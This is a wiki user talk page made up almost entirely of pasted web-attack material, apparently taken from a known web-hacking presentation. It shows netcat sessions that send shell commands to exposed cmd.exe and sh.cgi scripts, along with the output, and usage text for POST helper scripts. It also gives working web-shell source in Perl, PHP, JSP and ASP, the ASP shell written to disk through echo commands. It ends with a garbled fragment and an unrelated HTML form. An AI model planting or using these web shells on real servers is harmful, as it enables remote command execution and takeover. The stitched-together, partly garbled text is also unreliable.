User talk:Bigheadche

$ nc www1.example.com 80 POST /scripts/cmd.exe HTTP/1.0 Host: www1.example.com Content-length: 17

ver dir c:\ exit

HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Date: Wed, 08 Dec 1999 06:13:19 GMT Content-Type: application/octet-stream Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp.

C:\Inetpub\scripts>ver

Windows NT Version 4.0

C:\Inetpub\scripts>dir c:\ Volume in drive C has no label. Volume Serial Number is E43A-2A0A

Directory of c:\

10/04/00 05:28a                  WINNT 10/04/00 05:31a                  Program Files 10/04/00 05:37a                  TEMP 10/04/00 07:01a                  Inetpub 10/04/00 07:01a                  certs 11/28/00 05:12p                  software 12/06/00 03:46p                  src 12/07/00 12:50p                  weblogic 12/07/00 12:53p                  weblogic_publish 12/07/99 01:11p                  JavaWebServer2.0 12/07/99 06:49p           134,217,728 pagefile.sys 12/07/99 07:24a                  urlscan 12/07/99 04:55a                  Netscape 13 File(s)   134,217,728 bytes 120,782,848 bytes free

C:\Inetpub\scripts>exit $

$ nc www2.example.com 80 POST /cgi-bin/sh.cgi HTTP/1.0 Host: www2.example.com Content-type: text/html Content-length: 60

echo 'Content-type: text/html' echo uname id ls -la / exit

HTTP/1.1 200 OK Date: Thu, 27 Nov 2003 20:47:20 GMT Server: Apache/1.3.12 Connection: close Content-Type: text/html

Linux uid=99(nobody) gid=99(nobody) groups=99(nobody) total 116 drwxr-xr-x  19 root     root         4096 Feb  2  2002. drwxr-xr-x  19 root     root         4096 Feb  2  2002 .. drwxr-xr-x   2 root     root         4096 Jun 20  2001 bin drwxr-xr-x   2 root     root         4096 Nov 28 02:01 boot drwxr-xr-x   6 root     root        36864 Nov 28 02:01 dev drwxr-xr-x  29 root     root         4096 Nov 28 02:01 etc drwxr-xr-x   8 root     root         4096 Dec  1  2001 home drwxr-xr-x   4 root     root         4096 Jun 19  2001 lib drwxr-xr-x   2 root     root        16384 Jun 19  2001 lost+found drwxr-xr-x   4 root     root         4096 Jun 19  2001 mnt drwxr-xr-x   3 root     root         4096 Feb  2  2002 opt dr-xr-xr-x  37 root     root            0 Nov 28  2003 proc drwxr-x---   9 root     root         4096 Feb  9  2003 root drwxr-xr-x   3 root     root         4096 Jun 20  2001 sbin drwxrwxr-x   2 root     root         4096 Feb  2  2002 src drwxrwxrwt   7 root     root         4096 Nov 28 02:01 tmp drwxr-xr-x   4 root     root         4096 Feb  2  2002 u01 drwxr-xr-x  21 root     root         4096 Feb  2  2002 usr drwxr-xr-x  16 root     root         4096 Jun 19  2001 var $

usage: post_cmd.pl url [proxy:port] < data By Saumil Shah (c) net-square 2001

post_cmd.pl takes all the data to be POSTed to the URL as standard input. Either enter the data manually and hit ^D (unix) or ^Z (dos) to end; or redirect the data using files or pipes

$ ./post_cmd.pl http://www1.example.com/scripts/cmd.exe ver dir c:\ ^D HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Date: Wed, 08 Dec 1999 06:05:46 GMT Content-Type: application/octet-stream Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp.

C:\Inetpub\scripts>ver

Windows NT Version 4.0

C:\Inetpub\scripts>dir c:\ Volume in drive C has no label. Volume Serial Number is E43A-2A0A

Directory of c:\

10/04/00 05:28a                  WINNT 10/04/00 05:31a                  Program Files 10/04/00 05:37a                  TEMP 10/04/00 07:01a                  Inetpub 10/04/00 07:01a        <DIR>          certs 11/28/00 05:12p        <DIR>          software 12/06/00 03:46p        <DIR>          src 12/07/00 12:50p        <DIR>          weblogic 12/07/00 12:53p        <DIR>          weblogic_publish 12/07/99 01:11p        <DIR>          JavaWebServer2.0 12/07/99 06:49p           134,217,728 pagefile.sys 12/07/99 07:24a        <DIR>          urlscan 12/07/99 04:55a        <DIR>          Netscape 13 File(s)   134,217,728 bytes 120,782,848 bytes free

C:\Inetpub\scripts>exit $

$ ./post_sh.pl http://www2.example.com/cgi-bin/sh.cgi uname id ls -la / ^D HTTP/1.1 200 OK Date: Thu, 27 Nov 2003 20:43:54 GMT Server: Apache/1.3.12 Connection: close Content-Type: text/html

Linux uid=99(nobody) gid=99(nobody) groups=99(nobody) total 116 drwxr-xr-x  19 root     root         4096 Feb  2  2002. drwxr-xr-x  19 root     root         4096 Feb  2  2002 .. drwxr-xr-x   2 root     root         4096 Jun 20  2001 bin drwxr-xr-x   2 root     root         4096 Nov 28 02:01 boot drwxr-xr-x   6 root     root        36864 Nov 28 02:01 dev drwxr-xr-x  29 root     root         4096 Nov 28 02:01 etc drwxr-xr-x   8 root     root         4096 Dec  1  2001 home drwxr-xr-x   4 root     root         4096 Jun 19  2001 lib drwxr-xr-x   2 root     root        16384 Jun 19  2001 lost+found drwxr-xr-x   4 root     root         4096 Jun 19  2001 mnt drwxr-xr-x   3 root     root         4096 Feb  2  2002 opt dr-xr-xr-x  37 root     root            0 Nov 28  2003 proc drwxr-x---   9 root     root         4096 Feb  9  2003 root drwxr-xr-x   3 root     root         4096 Jun 20  2001 sbin drwxrwxr-x   2 root     root         4096 Feb  2  2002 src drwxrwxrwt   7 root     root         4096 Nov 28 02:01 tmp drwxr-xr-x   4 root     root         4096 Feb  2  2002 u01 drwxr-xr-x  21 root     root         4096 Feb  2  2002 usr drwxr-xr-x  16 root     root         4096 Jun 19  2001 var $


 * 1) !/usr/bin/perl

require "cgi-lib.pl";

print &PrintHeader; print "<FORM ACTION=perl_shell.cgi METHOD=GET>\n"; print "<INPUT NAME=cmd TYPE=TEXT>\n"; print "<INPUT TYPE=SUBMIT VALUE=Run>\n"; print "</FORM>\n";

&ReadParse(*in);

if($in{'cmd'} ne "") { print " \n$in{'cmd'}\n\n"; print `/bin/bash -c "$in{'cmd'}"`; print " \n"; } <FORM ACTION="sys.php" METHOD=POST> Command: <INPUT TYPE=TEXT NAME=cmd> <INPUT TYPE=SUBMIT VALUE="Run"> <FORM> <?php if(isset($cmd)) { system($cmd); } ?> <PRE>

<FORM METHOD=GET ACTION='cmdexec.jsp'> <INPUT name='cmd' type=text> <INPUT type=submit value='Run'> </FORM>

<%@ page import="java.io.*" %> <%  String cmd = request.getParameter("cmd"); String output = "";

if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime.exec(cmd); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream)); while((s = sI.readLine) != null) { output += s;        } }     catch(IOException e) { e.printStackTrace; }  } %>

<%=output %>

echo ^<^% > cmdasp.asp echo Dim oScript, oScriptNet, oFileSys, oFile, szCMD, szTempFile >> cmdasp.asp echo On Error Resume Next >> cmdasp.asp echo Set oScript = Server.CreateObject(^"WSCRIPT.SHELL^") >> cmdasp.asp echo Set oScriptNet = Server.CreateObject(^"WSCRIPT.NETWORK^") >> cmdasp.asp echo Set oFileSys = Server.CreateObject(^"Scripting.FileSystemObject^") >> cmdasp.asp echo szCMD = Request.Form(^".CMD^") >> cmdasp.asp echo If (szCMD ^<^> ^"^") Then >> cmdasp.asp echo szTempFile = ^"C:\^" & oFileSys.GetTempName >> cmdasp.asp echo Call oScript.Run(^"cmd.exe /c ^" ^& szCMD ^& ^" ^> ^" ^& szTempFile,0,True) >> cmdasp.asp echo Set oFle = oFileSys.OpenTextFile(szTempFile,1,False,0) >> cmdasp.asp echo End If >> cmdasp.asp echo ^%^> >> cmdasp.asp echo ^<FORM action=^"^<^%= Request.ServerVariables(^"URL^") ^%^>^" method=^"POST^"^> >> cmdasp.asp echo ^<input type=text name=^".CMD^" size=70 value=^"^<^%= szCMD ^%^>^"^> >> cmdasp.asp echo ^<input type=submit value=^"Run^"^> >> cmdasp.asp echo ^</FORM^> >> cmdasp.asp echo ^<PRE^> >> cmdasp.asp echo ^<^% >> cmdasp.asp echo If (IsObject(oFile)) Then >> cmdasp.asp echo On Error Resume Next >> cmdasp.asp echo Response.Write Server.HTMLEncode(oFile.ReadAll) >> cmdasp.asp echo oFile.Close >> cmdasp.asp echo Call oFileSys.DeleteFile(szTempFile, True) >> cmdasp.asp echo End If >> cmdasp.asp echo ^%^> >> cmdasp.asp echo ^<^/PRE^> >> cmdasp.asp

Html (codec = [caos22]) Operation codec: c:/My Documents:File Uplink dota..sedf

<FORM action="http://somesite.com/prog/adduser" method="post"> <P> First name: <INPUT type="text" name="firstname"><BR> Last name: <INPUT type="text" name="lastname"><BR> email: <INPUT type="text" name="email"><BR> <INPUT type="radio" name="sex" value="Male"> Male<BR> <INPUT type="radio" name="sex" value="Female"> Female<BR> <INPUT type="submit" value="Send"> <INPUT type="reset"> </P>